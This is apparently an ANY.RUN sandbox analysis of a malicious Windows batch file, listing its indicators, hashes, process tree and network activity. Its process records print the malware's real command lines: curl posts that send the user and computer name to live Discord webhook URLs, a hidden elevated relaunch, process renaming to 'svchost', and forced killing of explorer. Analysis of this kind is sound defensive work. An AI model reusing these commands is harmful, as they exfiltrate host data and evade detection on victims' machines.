File name:

main.bat

Full analysis: https://app.any.run/tasks/cb63c276-4a02-4c69-80c0-15913366128c
Verdict: Malicious activity
Analysis date: October 06, 2024, 03:39:44
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
discord
ims-api
generic
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with very long lines (659), with CRLF line terminators
MD5:

1D3F0763C7B030CA8DE5861E33EB2F12

SHA1:

DA40E03620CA6964DF9A6CDDE5FEA57F7B8C7AAE

SHA256:

C586885272A42ABA67487186920CC90DDFCF8690F28FD05AE98BBC1B572204ED

SSDEEP:

192:wdEdpEFc5B7bbtSNCkQFoJQHxt9cxNRJXsEWVejOFj9F:wqdXb7OJ8oSHxGMP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3828)
      • powershell.exe (PID: 1656)

  • SUSPICIOUS

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 6232)
      • cmd.exe (PID: 6436)

    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 6232)
      • cmd.exe (PID: 6436)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6232)
      • cmd.exe (PID: 6436)

    • Starts NET.EXE to display or manage information about active sessions

      • cmd.exe (PID: 6232)
      • net.exe (PID: 7164)
      • cmd.exe (PID: 6436)
      • net.exe (PID: 4224)

    • Powershell scripting: start process

      • cmd.exe (PID: 6232)
      • cmd.exe (PID: 6436)

    • Executing commands from a ".bat" file

      • powershell.exe (PID: 3828)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3828)

    • Get information on the list of running processes

      • cmd.exe (PID: 6436)

    • Imports DLL using pinvoke

      • powershell.exe (PID: 2480)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 832)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 832)

    • Kill processes via PowerShell

      • powershell.exe (PID: 6284)
      • powershell.exe (PID: 4528)
      • powershell.exe (PID: 2572)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • cmd.exe (PID: 6436)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 6436)

    • The process checks if current user has admin rights

      • cmd.exe (PID: 6436)

  • INFO

    • Checks supported languages

      • curl.exe (PID: 1448)
      • curl.exe (PID: 2964)
      • curl.exe (PID: 4280)
      • curl.exe (PID: 2820)
      • csc.exe (PID: 832)
      • cvtres.exe (PID: 5668)

    • Reads the computer name

      • curl.exe (PID: 2964)
      • curl.exe (PID: 1448)
      • curl.exe (PID: 4280)
      • curl.exe (PID: 2820)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 5276)
      • WMIC.exe (PID: 2964)

    • The process uses the downloaded file

      • powershell.exe (PID: 3828)

    • Attempting to use instant messaging service

      • curl.exe (PID: 2964)
      • curl.exe (PID: 2820)
      • curl.exe (PID: 4280)
      • curl.exe (PID: 1448)
      • curl.exe (PID: 5512)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 832)

    • Create files in a temporary directory

      • csc.exe (PID: 832)
      • cvtres.exe (PID: 5668)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2480)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(6436) cmd.exe
Discord-Webhook-Tokens (2)1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd
1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz
Discord-Info-Links
1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd
Get Webhook Infohttps://discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd
1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz
Get Webhook Infohttps://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
171
Monitored processes
35
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start start cmd.exe no specs conhost.exe no specs curl.exe wmic.exe no specs findstr.exe no specs curl.exe net.exe no specs net1.exe no specs powershell.exe no specs THREAT cmd.exe conhost.exe no specs curl.exe wmic.exe no specs findstr.exe no specs curl.exe net.exe no specs net1.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs curl.exe textinputhost.exe no specs startmenuexperiencehost.exe no specs tiworker.exe no specs searchapp.exe mobsync.exe no specs svchost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
832"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\i2lecute\i2lecute.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
1448curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY admin, Computer: DESKTOP-JGLLJLD\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
1656powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\admin\AppData\Local\Temp\main.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
2480powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2572powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
2820curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY admin, Computer: DESKTOP-JGLLJLD\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\ucrtbase.dll
2820C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -EmbeddingC:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Modules Installer Worker
Exit code:
0
Version:
10.0.19041.3989 (WinBuild.160101.0800)
Modules
Images
c:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
2964curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: admin, Computer: DESKTOP-JGLLJLD\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
2964wmic computersystem get manufacturer,model C:\Windows\System32\wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
3828powershell -Command "Start-Process -FilePath 'C:\Users\admin\AppData\Local\Temp\main.bat' -Verb RunAs" -WindowStyle HiddenC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
62 204
Read events
62 080
Write events
116
Delete events
8

Modification events

(PID) Process:(3828) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.FriendlyAppName
Value:
Windows Command Processor
(PID) Process:(3828) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.ApplicationCompany
Value:
Microsoft Corporation
(PID) Process:(4780) StartMenuExperienceHost.exeKey:\REGISTRY\A\{fa0c0d3e-5919-37cd-32a2-e08bb9459807}\LocalState\DataCorruptionRecovery
Operation:writeName:InitializationAttemptCount
Value:
01000000384AB376A117DB01
(PID) Process:(4780) StartMenuExperienceHost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TileDataModel\Migration\StartNonLayoutProperties
Operation:writeName:Completed
Value:
1
(PID) Process:(4780) StartMenuExperienceHost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TileDataModel\Migration\StartNonLayoutProperties_AppUsageData
Operation:writeName:Completed
Value:
1
(PID) Process:(4780) StartMenuExperienceHost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TileDataModel\Migration\StartNonLayoutProperties_TargetedContentTiles
Operation:writeName:Completed
Value:
1
(PID) Process:(2820) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31135649
(PID) Process:(2820) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
(PID) Process:(4780) StartMenuExperienceHost.exeKey:\REGISTRY\A\{fa0c0d3e-5919-37cd-32a2-e08bb9459807}\LocalState\DataCorruptionRecovery
Operation:writeName:InitializationAttemptCount
Value:
0000000086FEE276A117DB01
(PID) Process:(4780) StartMenuExperienceHost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CloudStore\Store\Cache\DefaultAccount\$de${c6a388c9-afd3-47e2-a46b-29cb43ad4323}$start.tilegrid$windows.data.curatedtilecollection.tilecollection\Current
Operation:writeName:Data
Value:
020000004319E676A117DB0100000000434201000A0A00D0140CCA3200CB8C0A0212267B00410039003400310034003200440039002D0032003100350030002D0034003600380037002D0038003600390033002D003100450036003200320036003500390039003900430031007D000012267B00390033004600380044003900390046002D0036003500300041002D0034003100330035002D0038004200340043002D003200460046004100410041003300450046004600340039007D0000E22C01010000
Executable files
3
Suspicious files
56
Text files
338
Unknown types
0

Dropped files

PID
Process
Filename
Type
2480powershell.exeC:\Users\admin\AppData\Local\Temp\i2lecute\i2lecute.0.cstext
MD5:32E8AF8C0F84A8BB4647574F7D67F717
SHA256:6E0CCA3BBA43EBD5456B392D1B69740A3778B8A9FA86DAD6209C3FBE32335E7A
1656powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tn5theyw.5pd.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2480powershell.exeC:\Users\admin\AppData\Local\Temp\i2lecute\i2lecute.cmdlinetext
MD5:39330EF64EEC82E327E70AC8E4BB7CF6
SHA256:5AAAD730EB89E7ABE178D2861532DFF67EC70B9CC648B72F9B1333D40092CC5B
5668cvtres.exeC:\Users\admin\AppData\Local\Temp\RES777F.tmpbinary
MD5:BD6E3BE2E919B2769DCC7602ECA4839F
SHA256:17442B8B9CF94FF33181187F67EEDAD7ED37904570BEF343E95EABB8D63ED043
2480powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qfe2owuf.2ae.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6980powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_o53gj0yn.55z.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
832csc.exeC:\Users\admin\AppData\Local\Temp\i2lecute\i2lecute.outtext
MD5:FEAA941680D0ACD1B158990C10991748
SHA256:41DE29E331C58BB74369703C39799A9080C7099C56171AEE5DADC1A209A50C03
3828powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:A757EC0601F6300B3C85CA9F747C80B9
SHA256:1475B488B89536C0C402C8C735FF2A8FA83014EA60554538DFB1AAB486E7A013
6284powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4pccft4r.itw.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2480powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gveaevhb.idb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
69
DNS requests
23
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2120
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
768
lsass.exe
GET
200
142.250.186.131:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
768
lsass.exe
GET
200
142.250.186.131:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
5032
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4848
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
2836
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2836
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4712
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
8
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2120
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
2964
curl.exe
162.159.138.232:443
discord.com
CLOUDFLARENET
whitelisted
768
lsass.exe
142.250.186.131:80
c.pki.goog
GOOGLE
US
whitelisted
1448
curl.exe
162.159.138.232:443
discord.com
CLOUDFLARENET
whitelisted
4324
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 95.101.149.131
whitelisted
google.com
  • 142.250.186.110
whitelisted
discord.com
  • 162.159.138.232
  • 162.159.135.232
  • 162.159.136.232
  • 162.159.137.232
  • 162.159.128.233
whitelisted
c.pki.goog
  • 142.250.186.131
whitelisted
login.live.com
  • 20.190.160.17
  • 40.126.32.134
  • 40.126.32.68
  • 40.126.32.76
  • 40.126.32.74
  • 20.190.160.20
  • 40.126.32.140
  • 40.126.32.136
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
client.wns.windows.com
  • 40.115.3.253
  • 40.113.103.199
whitelisted
go.microsoft.com
  • 184.30.17.189
whitelisted
ptb.discord.com
  • 162.159.128.233
  • 162.159.135.232
  • 162.159.136.232
  • 162.159.138.232
  • 162.159.137.232
whitelisted

Threats

PID
Process
Class
Message
2256
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
2964
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
1448
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
4280
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
2820
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
2256
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
5512
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
main.bat